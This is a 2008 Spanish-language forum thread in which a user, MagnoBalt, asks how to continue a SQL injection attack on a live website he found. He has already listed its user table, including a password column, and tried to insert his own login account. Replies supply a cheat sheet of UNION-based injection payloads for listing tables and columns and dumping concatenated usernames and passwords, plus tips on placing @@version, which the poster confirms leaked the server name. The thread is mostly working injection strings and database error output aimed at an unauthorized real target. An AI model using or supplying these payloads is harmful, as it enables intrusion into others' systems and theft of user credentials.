Título: Como seguir Con la inyeccion SQL Publicado por: MagnoBalt en 26 Agosto 2008, 17:24 pm Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas.. les muestro algunas
dbo.tblUser.User_ID dbo.tblUser.User_Code dbo.tblUser.User_Password dbo.tblUser.User_Permissions dbo.tblUser.User_Number dbo.tblUser.User_Firstname dbo.tblUser.User_Surname dbo.tblUser.User_TitleBefore dbo.tblUser.User_TitleAfter . . Ahora cuando llego a tratar de sacarle la version por ejemplo con esto: 'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Me tira este error... Citar Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint. Cuando me tendrai q dar algo asi..Citar Error Type: Lo mismo pasa si pongo por ejemplo Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int. 'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- No se a lo qiue se refiere con ese error... Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse ';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') -- Y obtengo este error: Citar error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated. Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!! Un abrazo Si alguien me puede dar una mano!! Gracias Título: Re: Como seguir Con la inyeccion SQL Publicado por: Darioxhcx en 26 Agosto 2008, 18:42 pm capas que eso te sirve
************************************************************************* * Information Schema * ************************************************************************* -1/**/union/**/select/**/0,1,2,3/* ************************************************************************* * Nombre de las Tablas * ************************************************************************* -1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/* ************************************************************************* * Recorrer las Tablas * ************************************************************************* -1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/1,1/* -1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/2,1/* -1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/3,1/* ************************************************************************* * Entrar en la Tabla * ************************************************************************* -1/**/union/**/select/**/0,1,2,3/**/from/**/NOMBRE_DE_LA_TABLA ************************************************************************* * Buscar Columnas en Una Tabla * ************************************************************************* -1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/**/where/* */table_schema='NOMBRE_DB_AQUI'/**/and/**/table_name='NOMBRE_TABLA_AQUI' O -1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/* */where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/* (N O M B R E D E L A T A B L A E N A S C I I) ************************************************************************* * Recorrer Datos de la Columna * ************************************************************************* -1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/* */where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/**/limit/**/0,1/* (N O M B R E D E L A T A B L A E N A S C I I) ************************************************************************* * Concatenar * ************************************************************************* -1/**/union/**/select/**/0,1,concat(NOMBRE_COLUMNA,0x3a,NOMBRE_COLUMNA,0x3a ,etc),3/**/from/**/NOMBRE_DE_LA_TABLA/* Ejemplo: -1/**/union/**/select/**/0,1,concat(username,0x3a,password,0x3a,email),3/ **/from/**/usuarios/* ************************************************************************** * Funciones de Informaci?n * ************************************************************************** * version() : version actual de mysql * database() : nombre base de datos * user() : conectado a la base de datos * system_user() * session_user() * current_user() * last_insert_id() * connection_id() ************************************************************************** * By boER! * ************************************************************************** * Greets: Remote Execution * ************************************************************************** Fuente Remoteexecution.org saludos Título: Re: Como seguir Con la inyeccion SQL Publicado por: ChElAnO en 26 Agosto 2008, 19:09 pm 'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Citar Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint. prueba poniendo lo que quieres sacar en otras posiciones de la consulta 'union select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- 'union select 1,1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- ..... ...... Título: Re: Como seguir Con la inyeccion SQL Publicado por: MagnoBalt en 26 Agosto 2008, 23:42 pm Ahi esta una ya solocione en vez de colocarlo asi
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Lo coloque asi 'union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, @@servername -- y me dio su hermosoo Error Citar Error: ERROR [22018] [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'WSMSSQL02..................' to data type int. Si alguien sabe A que se refiere con el error donde me dice que esta duplicando el dato en la clave primaria... coloco otra vezCitar error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated. Ahora vengo de la facu y sigo intentandoo..Saludos Grcias por la ayuda tambienn |